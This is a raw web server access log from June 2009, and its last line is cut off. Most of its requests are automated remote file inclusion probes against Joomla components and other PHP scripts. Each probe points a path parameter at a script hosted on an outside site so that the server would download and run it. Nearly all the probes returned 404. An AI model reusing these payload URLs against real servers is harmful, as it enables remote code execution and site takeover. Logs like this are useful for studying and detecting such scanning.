123.143.98.5 - - [12/Jun/2009:04:00:22 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
213.149.105.23 - - [12/Jun/2009:04:00:22 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
66.249.71.14 - - [12/Jun/2009:04:00:29 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6074E03D2B7896003EE901C+WSEQ(S0060):1+OUITEM(A0200):04948002 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.149.105.23 - - [12/Jun/2009:04:01:14 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
66.225.228.90 - - [12/Jun/2009:04:03:42 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:03:42 -0400] "GET /logs/access_log.Q109052300%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:03:42 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:04:03:45 -0400] "GET /logs/help.php?css_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:04:03:45 -0400] "GET /help.php?css_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:04:03:45 -0400] "GET /logs/access_log.Q109052100%20%20/help.php?css_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.55.106.237 - - [12/Jun/2009:04:03:54 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.225.228.90 - - [12/Jun/2009:04:03:54 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.249.71.14 - - [12/Jun/2009:04:03:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102121498F111700654E06Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.225.228.90 - - [12/Jun/2009:04:04:04 -0400] "GET /logs/access_log.Q109052300%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:04:04 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:04:04 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:04:08 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:04:08 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:04:08 -0400] "GET /logs/access_log.Q109052300%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:04:04:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.225.228.90 - - [12/Jun/2009:04:04:14 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:04:16 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
65.55.106.237 - - [12/Jun/2009:04:04:42 -0400] "GET /logs/access_log.Q108110300 HTTP/1.1" 404 224 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.6.22.170 - - [12/Jun/2009:04:05:57 -0400] "GET /logs/access_log.Q107120500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.125.38.117 - - [12/Jun/2009:04:06:10 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:04:06:10 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:04:06:12 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:04:06:12 -0400] "GET /logs/access_log.Q109052300%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:04:06:54 -0400] "GET /logs/error_log.Q108020800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
190.144.44.36 - - [12/Jun/2009:04:07:11 -0400] "GET /logs/error_log.Q108052600/components/com_facileforms/facileforms.frame.php?ff_compath=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Jun/2009:04:07:11 -0400] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Jun/2009:04:07:11 -0400] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
116.125.126.72 - - [12/Jun/2009:04:07:57 -0400] "GET /logs/access_log.Q109052800//include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:07:57 -0400] "GET //include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:07:57 -0400] "GET /logs//include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:08:18 -0400] "GET /logs//include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:08:18 -0400] "GET /logs/access_log.Q109052800//include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:08:20 -0400] "GET //include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:21 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:21 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:24 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:24 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:24 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:24 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:24 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:24 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:25 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:26 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:26 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:27 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:31 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:31 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jun/2009:04:08:31 -0400] "GET /logs/error_log.Q108092400/components/com_facileforms/facileforms.frame.php?ff_compath=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
118.129.166.203 - - [12/Jun/2009:04:08:36 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:58 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:58 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:08:59 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:31 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:31 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:31 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:32 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:32 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:32 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:37 -0400] "GET /logs/access_log.Q109053100%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:40 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
115.133.214.159 - - [12/Jun/2009:04:09:45 -0400] "GET /logs/error_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://littlesaints.bravehost.com/peppe/just.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
118.129.166.203 - - [12/Jun/2009:04:09:47 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:47 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:47 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:48 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:48 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:09:51 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:04:09:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [12/Jun/2009:04:10:17 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:10:29 -0400] "GET /logs/access_log.Q109052800%20%20//include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:10:39 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:10:41 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jun/2009:04:10:47 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:10:47 -0400] "GET /logs/access_log.Q109052800%20%20//include/header.php?_path[counter]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:10:56 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:10:56 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:04:10:57 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:11:06 -0400] "GET /logs/access_log.Q109053100%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jun/2009:04:11:13 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
12.68.140.202 - - [12/Jun/2009:04:11:48 -0400] "GET /logs/access_log.Q109052300/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 296 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:04:11:48 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
118.129.166.203 - - [12/Jun/2009:04:11:50 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:11:50 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:11:50 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
12.68.140.202 - - [12/Jun/2009:04:11:51 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:04:12:16 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 296 "-" "libwww-perl/5.820"
118.129.166.203 - - [12/Jun/2009:04:12:31 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:04:12:54 -0400] "GET /logs/access_log.Q109052100/help.php?css_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:04:13:14 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:04:13:18 -0400] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:13:18 -0400] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:13:18 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:13:20 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:04:13:25 -0400] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:04:13:25 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:04:13:25 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:13:31 -0400] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:13:32 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
66.225.228.90 - - [12/Jun/2009:04:13:32 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:04:13:42 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:04:13:42 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:04:13:42 -0400] "GET /logs/access_log.Q109052300/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:04:13:42 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
66.249.71.14 - - [12/Jun/2009:04:13:54 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0065594499E15500D6CE01I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.216.86 - - [12/Jun/2009:04:13:59 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:04:13:59 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:04:13:59 -0400] "GET /logs/error_log.Q109042700/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mo